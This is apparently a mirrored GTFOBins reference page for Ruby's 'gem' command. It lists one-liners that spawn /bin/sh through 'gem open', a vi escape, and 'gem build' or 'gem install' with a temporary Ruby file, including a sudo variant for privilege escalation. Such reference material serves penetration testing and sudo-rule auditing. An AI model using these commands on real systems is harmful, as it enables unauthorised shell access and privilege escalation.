1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/gem.md
2020-03-14 13:08:13 +01:00

1013 B

functions
shell sudo
description code
This requires the name of an installed gem to be provided (`rdoc` is usually installed). gem open -e "/bin/sh -c /bin/sh" rdoc
description code
This invokes the default editor, which is likely to be [`vi`](/gtfobins/vi/), other functions may apply. This requires the name of an installed gem to be provided (`rdoc` is usually installed). gem open rdoc :!/bin/sh
description code
This executes the specified file as [`ruby`](/gtfobins/ruby/) code. TF=$(mktemp -d) echo 'system("/bin/sh")' > $TF/x gem build $TF/x
description code
This executes the specified file as [`ruby`](/gtfobins/ruby/) code. TF=$(mktemp -d) echo 'system("/bin/sh")' > $TF/x gem install --file $TF/x
description code
This requires the name of an installed gem to be provided (`rdoc` is usually installed). sudo gem open -e "/bin/sh -c /bin/sh" rdoc